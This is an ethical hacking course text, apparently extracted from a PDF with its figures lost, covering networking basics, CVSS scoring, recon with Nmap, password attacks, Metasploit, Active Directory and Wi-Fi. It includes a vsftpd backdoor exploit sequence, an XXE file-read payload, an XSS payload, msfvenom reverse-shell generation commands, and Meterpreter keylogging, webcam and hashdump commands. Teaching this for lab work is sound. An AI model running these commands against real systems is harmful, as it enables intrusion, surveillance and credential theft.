Ethical Hacking Course
Ethical Hacking Course
Chapter 1: Introduction
Chapter 2: Network
Chapter 3: How The Web Work
Chapter 4: Install Kali Linux & Linux Command
Chapter 5: Exploit & CVE
Chapter 6: Information Gathering (Recon)
Chapter 7: Burp Suite
Chapter 8: Password Attack
Chapter 9: Shell
Chapter 10: Wireshark
Chapter 11: Network Service Attack
Chapter 12: OWASP 10
Chapter 13: Web Hacking
Chapter 14: Metasploit
Chapter 15: Active Directory
Chapter 16: Wi-Fi Hacking
Chapter 17: Capture The Flag (CTF)
2
Chapter 1
Introduction
3
4
Chapter 2
Network
5
IP Addresses:
Briefly, an IP address (or Internet Protocol) address can be used as a way of identifying
a host on a network for a period of time, where that IP address can then be associated
with another device without the IP address changing. First, let's split up precisely what
an IP address is in the diagram below:
An IP address is a set of numbers that are divided into four octets. The value of each
octet will summaries to be the IP address of the device on the network. This number is
calculated through a technique known as IP addressing & subnetting.
What's important to understand here is that IP addresses can change from device to
device but cannot be active simultaneously more than once within the same network.
These two devices will be able to use their private IP addresses to communicate with
each other. However, any data sent to the Internet from either of these devices will be
identified by the same public IP address. Public IP addresses are given by your Internet
Service Provider (or ISP).
6
MAC Address:
Devices on a network will all have a physical network interface, which is a microchip
board found on the device's motherboard. This network interface is assigned a unique
address at the factory it was built at, called a MAC (Media Access Control ) address.
The MAC address is a twelve-character hexadecimal number (a base sixteen
numbering system used in computing to represent numbers) split into two's and
separated by a colon. These colons are considered separators. For example,
a4:c3:f0:85:ac:2d. The first six characters represent the company that made the network
interface, and the last six is a unique number.
7
8
Fire Walls: A firewall is a device within a network responsible for determining what
traffic is allowed to enter and exit. Think of a firewall as border security for a network. An
administrator can configure a firewall to permit or deny traffic from entering or exiting a
network based on numerous factors such as:
Where the traffic is coming from? (has the firewall been told to accept/deny traffic
from a specific network?)
Where is the traffic going to? (has the firewall been told to accept/deny traffic
destined for a specific network?)
What port is the traffic for? (has the firewall been told to accept/deny traffic
destined for port 80 only?)
What protocol is the traffic using? (has the firewall been told to accept/deny traffic
that is UDP, TCP or both?)
Network Services:
What is FTP? : File Transfer Protocol (FTP), a protocol used to allow remote transfer of
files over a network.
What is NFS?: NFS stands for "Network File System" and allows a system to share
directories and files with others over a network. By using NFS, users and programs can
access files on remote systems almost as if they were local files.
What is SMTP?: SMTP stands for "Simple Mail Transfer Protocol". It is utilised to
handle the sending of emails. In order to support email services.
9
Chapter 3
How The Web Work
What is DNS?
DNS (Domain Name System) provides a simple way for us to communicate with
devices on the internet without remembering complex numbers. Much like every house
has a unique address for sending mail directly to it, every computer on the internet has
its own unique address to communicate with it called an IP address. An IP address
looks like the following 104.26.10.229, 4 sets of digits ranging from 0 - 255 separated by
a period. When you want to visit a website, it's not exactly convenient to remember this
complicated set of numbers, and that's where DNS can help. So instead of
remembering 104.26.10.229, you can remember tryhackme.com instead.
10
DNS Record Types:
A Record
AAAA Record
CNAME Record
These records resolve to another domain name, for example, SulyCyberCon online
shop has the subdomain name store.sulycybercon.com which returns a CNAME record
shops.shopify.com.
MX Record
handle the email for the domain you are querying, for example an MX record response
for sulycybercon.com would look something like alt1.aspmx.l.google.com.
11
What is a URL? (Uniform Resource Locator)
GET Request
POST Request
This is used for submitting data to the web server and potentially creating new records
PUT Request
DELETE Request
12
HTTP Status Codes:
Cookie: Cookies can be used for many purposes but are most commonly used for
website authentication.
13
Chapter 4
Install Kali Linux
&
Linux Command
14
Chapter 5
Exploit & CVE
15
Exploit:
Exploitation is a piece of programmed software or script which can allow hackers to take
control over a system, exploiting its vulnerabilities.
1. SearchSploit
2. Exploit-DB
3. Metasploit
Introduction:
When you are submitting a vulnerability report to a company, it is very important to be
able to communicate your findings in a clear and concise manner, where the security or
triage team receiving your report are able to reproduce it as quickly as possible.
16
Attack Vector:
Describing deeply the 4 scenarios, we can have: a Remote attack when the exploit can
be delivered over the Internet, an Adjacent attack vector when the malicious actor is
inside the same intranet of the victim, a Local scenario is when the issue lies at
operating system accounts level, and finally a Physical attack vector is when you can
physically access the victim’s device.
Attack Complexity:
does it require additional information about the target such as unguessable IDs, a
certain configuration or settings, valid credentials (e.g. for MFA issues), or some other
conditions in order for your exploit to work?
Privileges Required:
if the vulnerable component is within an admin panel, we recommend setting the
requirement to “High” versus a vulnerability where you need to be invited to an
organization by an admin (where as self registration is not possible) we recommend
privileges to be as low.
User Interaction
vulnerability can be exploited solely at the will of the attacker, or whether a separate
user (or user-initiated process) must participate in some manner. The Score is highest
when no user interaction is required since it increases a further step in the exploitability
of the attack.
Scope
Does a successful attack impact a component other than the vulnerable component? If
so, the Score increases and the Confidentiality, Integrity and Authentication metrics
should be scored relative to the impacted component.
Confidentiality
confidentiality of the information resources managed by a software due to a successfully
exploited vulnerability. Confidentiality refers to limiting information access and
disclosure to only authorized users, as well as preventing access by, or disclosure to,
unauthorized.
17
Integrity
integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness
and veracity of information.
Availability
availability of the impacted component resulting from a successfully exploited
vulnerability. It refers to the loss of availability of the impacted component itself, such as
a networked service (e.g., web, database, email). Since availability refers to the
accessibility of information resources, attacks that consume network bandwidth,
processor cycles, or disk space all impact the availability of an impacted component.
Examples
18
Stored XSS from an admin to a user:
Attack Vector: Network as the attack can be done over the Internet
Attack Complexity: Low as there are no particular premises needed for this
attack to be successful
Privileges Required: High because the attackers needs to be an admin in order
for this vulnerability to be exploited
User Interaction: Required in case the user has to do some non-basic interaction
with the website in order to trigger the payload (like clicking a link). None in case
the victim needs to visit the homepage or do very trivial interactions with the
website
Scope: Changed since the vulnerable component is the web server and the
impacted component is the browser
Confidentiality: Low if access to the DOM is granted, None if there is no access
to the DOM
Integrity: Low the XSS can always cause defacement
Availability: None because the application can still be used by the victims
IDOR with access to read and modify personally identifiable information (PII):
Attack Vector: Network as the attack can be done over the Internet
Attack Complexity: High if they are UUIDs or high-entropy IDs. Low if they are
sequential IDs
Privileges Required: Low the attacker needs to be logged in to perform the
attack
User Interaction: None as this is solely a server side issue
Scope: Unchanged the impacted and the vulnerable component are the same
i.e. the web server
Confidentiality: High because it gives access to PII
Integrity: High because the attacker can delete/modify data
Availability: None because the application can still be used by the victims
19
Full-response SSRF vs Blind SSRF:
Attack Vector: Network as the attack can be done over the Internet
Attack Complexity: Low since the attack is normally straight-forward
Privileges Required: Low/High according to the level of privilege of the account
linked to the vulnerable functionality
User Interaction: None as this is solely a server side issue
Scope: Unchanged - in case of local port scanning as the impacted component
remains the web server. Changed if AWS or local file exfil is possible since the
impacted component is the cloud infrastructure
Confidentiality: Low/High depending on the type of information shown. None: in
case of Blind SSRF (no output)
Integrity: High in case AWS are leaked as it could lead to RCE. Low in case the
attacker can only access the intranet or the AWS
Availability: None because the application can still be used even if this has been
fully exploited (this does not include some edge cases where SSRF can take
down a service)
20
Chapter 6
Information Gathering (Recon)
21
1. Passive Reconnaissance:
you can access from publicly available resources without directly engaging with
the target.
1. Whois
2. Shodan
3. Github
4. Waybackmachine
5. Google
2. Active Reconnaissance:
Active reconnaissance requires you to make some kind of contact with your
target. This contact can be a phone call or a visit to the target company.
Nmap:
Subnets with /16, This subnet can have around 65 thousand hosts.
Subnets with /24, This subnet can have around 250 hosts.
22
FIN Scan: The FIN scan sends a TCP packet with the FIN flag set, no response will be
sent if the TCP port is open. Again, Nmap cannot be sure if the port is open or if a
firewall is blocking the traffic related to this TCP port.
23
range: 10.11.12.15-20.
subnet: 10.11.12.15/24
nmap -iL list_of_hosts.txt
Service Detection:
Adding -sV to your Nmap command will collect and determine service and version
information for the open ports. You can control the intensity with --version-intensity
LEVEL where the level ranges between 0, the lightest, and 9, the most complete. -sV --
version-light has an intensity of 2, while -sV --version-all has an intensity of 9.
24
OS Detection:
25
Nmap Script Engine (NSE):
Or you can use this -sC or –script=vuln or –script “http-csrf.nse” like this, and you
can use this script category
nmap -sC MACHINE_IP
nmap –script=vuln MACHINE_IP
nmap –script “http-csrf.nse” MACHINE_IP
Saving the Output:
The three main formats are:
1. Normal
2. Grepable (grepable)
3. XML
Normal: -oN FILENAME
Grepable: The grepable format has its name from the command grep,
-oG FILENAME
XML: -oX FILENAME
you can save the scan output in all three formats using -oA FILENAME
26
Script
Category Description
27
SWITCH EXAMPLE DESCRIPTION
-sV –version- nmap 192.168.1.1 -sV – Enable light mode. Lower possibility of
light version-light correctness. Faster
-sV –version- nmap 192.168.1.1 -sV – Enable intensity level 9. Higher possibility
all version-all of correctness. Slower
28
Chapter 6
Burp Suite
29
what is burp suite used for?
1. Foxy Proxy
2. Setup burp cert
3. Dashboard
4. Target
5. Proxy
6. Intruder
7. Repeater
8. Decoder
9. Extensions
10- Burp Collaborator Client
30
Chapter 7
Password Attack
31
Offline Password Attack:
Tool:
1. John
2. Hashcat
3. Hashid
32
Online Password Attack:
before we start attack you can use default credential after that start attack.
Default Credential:
1- https://default-password.info/
2- https://datarecovery.com/rd/default-passwords/
3- https://cirt.net/passwords?vendor=3COM
4-
crackstation.net is an online tool used for cracking Hash.
Tool:
Hydra: using hydra to attack:
1- HTTP
2- HTTPS
3- FTP
4- SSH
5- SMTP
6- SMB
33
Chapter 8
Shell
34
WebShells:
we would use this opportunity to upload code In these cases we would instead upload
a webshell.
Reverse Shell:
A reverse shell, also known as a remote shell or “connect-back shell,” Reverse shells
allow attackers to open ports to the target machines.
listener : nc -lvnp <PORT>
We can use pentestmonke for php reverse shell:
1. PHP-Reverse-Shell
2. Reverse-shell-generator
3. PayloadAllTheThings-Shell
35
Chapter 9
Wireshark
36
Wireshark, a tool used for creating and analyzing PCAPs (network packet capture files),
is commonly used as one of the best packet analysis tools.
Filtering Operators:
Basic Filtering:
ip.addr == <IP Address>
37
ip.src == <SRC IP > and ip.dst == <DST IP >
tcp.port eq <Port #> or <Protocol Name>
udp.port eq <Port #> or <Protocol Name>
Frame (Layer 1) -- This will show you what frame / packet you are looking at as
well as details specific to the Physical layer of the OSI model.
38
Source [MAC] (Layer 2) -- This will show you the source and destination MAC
Addresses; from the Data Link layer of the OSI model.
Source [IP] (Layer 3) -- This will show you the source and destination IPv4
Addresses; from the Network layer of the OSI model.
Protocol (Layer 4) -- This will show you details of the protocol used (UDP/TCP)
along with source and destination ports; from the Transport layer of the OSI
model.
39
Protocol Errors -- This is a continuation of the 4th layer showing specific
segments from TCP that needed to be reassembled.
Application Protocol (Layer 5) -- This will show details specific to the protocol
being used such HTTP, FTP, SMB, etc. From the Application layer of the OSI
model.
Application Data -- This is an extension of layer 5 that can show the application-
specific data.
40
Chapter 11
Network service attack
41
FTP (File Transfer Protocol):
Enumeration FTP:
42
Exploit FTP:
43
1. msfconsole
2. search exploit vsftpd 2.3.4
3. use exploit/unix/ftp/vsftpd_234_backdoor
4. options
5. set RHOSTS 192.168.116.132
6. exploit
44
This site is vulnerable to LFI We can look at /etc/passwd and see username
Exploit SSH:
┌─[wolfkissed@parrot]─[~/Desktop]
45
46
Network File System (NFS):
Enumeration NFS:
47
Exploit NFS:
48
Create SSH key and put into nfs directory
49
SMB:
Enumeration SMB:
Using enum4linux -a IP
50
Exploit SMB:
51
Download ssh key id_rsa
52
Chapter 12
OWASP 10
53
1- Command Injection:
2- Broken Authentication:
54
3- Sensitive Data Exposure:
55
4- XML External Entity:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
56
6- Security Misconfiguration:
57
7- Cross-site Scripting (XSS):
1. Reflected XSS
2. Stored XSS
3. Dom Based
<script>alert(‘xss-wolfkissed’);</script>
58
Chapter 13
Web Hacking
59
Walking An Application:
1- Viewing The Page Source
2- Developer Tools - Inspector
3- Developer Tools - Debugger
4- Developer Tools – Network
Content Discovery:
1- Manual Discovery - Robots.txt
2- Manual Discovery - Sitemap.xml
3- Manual Discovery - HTTP Headers
4- Manual Discovery - Framework Stack
5- OSINT - Google Hacking / Dorking
6- OSINT - Wappalyzer
7- OSINT - Wayback Machine
8- OSINT – GitHub
9- Automation - Fuzzing
Subdomain Enumeration:
1. Sublist3r
2. Assetfinder
3. subEnum
4. Google Droking
5. Vhost Fuzzing
Web Vulnerabilities
1. IDOR
2. SQL
3. Command Injection
4. SSRF
5. Cross-Site Scripting
6. Authentication Bypass
7. File Upload
60
Chapter 14
Metasploit
61
Metasploit:
Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool
that can support all phases of a penetration testing engagement, from information
gathering to post-exploitation.
Metasploit Command:
Metasploit Meterpreter:
msfvenom --list payloads show all payloads
Meterpreter commands
62
Core commands will be helpful to navigate and interact with the target system. Below
are some of the most commonly used. Remember to check all available commands
running the help command once a Meterpreter session has started.
Commands:
background: Backgrounds the current session
exit: Terminate the Meterpreter session
guid: Get the session GUID (Globally Unique Identifier)
help: Displays the help menu
info: Displays information about a Post module
irb: Opens an interactive Ruby shell on the current session
load: Loads one or more Meterpreter extensions
migrate: Allows you to migrate Meterpreter to another process
run: Executes a Meterpreter script or Post module
sessions: Quickly switch to another session
Networking commands
63
arp: Displays the host ARP (Address Resolution Protocol) cache
ifconfig: Displays network interfaces available on the target system
netstat: Displays the network connections
portfwd: Forwards a local port to a remote service
route: Allows you to view and modify the routing table
System commands
Other Command:
idletime: Returns the number of seconds the remote user has been idle
keyscan_dump: Dumps the keystroke buffer
keyscan_start: Starts capturing keystrokes
keyscan_stop: Stops capturing keystrokes
screenshare: Allows you to watch the remote user's desktop in real time
64
screenshot: Grabs a screenshot of the interactive desktop
record_mic: Records audio from the default microphone for X seconds
webcam_chat: Starts a video chat
webcam_list: Lists webcams
webcam_snap: Takes a snapshot from the specified webcam
webcam_stream: Plays a video stream from the specified webcam
getsystem: Attempts to elevate your privilege to that of local system
hashdump: Dumps the contents of the SAM database
Msfvenom:
msfvenom -l payloads
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw >
reverse_shell.php
Other Payloads:
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f
exe > rev_shell.exe
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw >
rev_shell.php
65
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f
asp > rev_shell.asp
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw >
rev_shell.py
after that you can run Metasploit (msfconsole) and use this command ( use
exploit/multi/handler ) and set ( LHOST, LPORT , payload) and exploit or run
66
Chapter 15
Active Directory
67
Windows domain is a group of users and computers. centralise the administration of
common components of a Windows computer network in a single repository called
Active Directory (AD). The server that runs the Active Directory services is known as a
Domain Controller (DC).
Users
Machines: PC$
Security
Description
Group
Users of this group have administrative privileges over the entire domain. By
Domain
default, they can administer any computer on the domain, including the
Admins
DCs.
Server Users in this group can administer Domain Controllers. They cannot change
Operators any administrative group memberships.
Backup Users in this group are allowed to access any file, ignoring their
Operators permissions. They are used to perform backups of data on computers.
Account
Users in this group can create or modify other accounts in the domain.
Operators
Domain
Includes all existing computers in the domain.
Computers
Domain
Includes all existing DCs on the domain.
Controllers
When using Windows domains, all credentials are stored in the Domain Controllers.
Whenever a user tries to authenticate to a service using domain credentials, the service
will need to ask the Domain Controller to verify if they are correct. Two protocols can be
used for network authentication in windows domains:
Kerberos: Used by any recent version of Windows. This is the default protocol in
any recent domain.
NetNTLM: Legacy authentication protocol kept for compatibility purposes.
Kerberos Authentication: Kerberos authentication is the default authentication
protocol for any recent version of Windows.
NetNTLM Authentication: NetNTLM works using a challenge-response mechanism.
68
Active Directory Attack
Enumeration:
69
Know enumeration User
70
Exploit:
71
allow us to retrieve all of the password hashes
know we use evil-win to pass the hass
72
Chapter 16
Wi-Fi Hacking
73
Change Managed Mode to monitor mode
74
75
Let’s find 3 way handshake
76
77
Chapter 17
Capture The Flag CTF
78
Basic Pentesting
Mr Robot
Blue
Juice Shop
79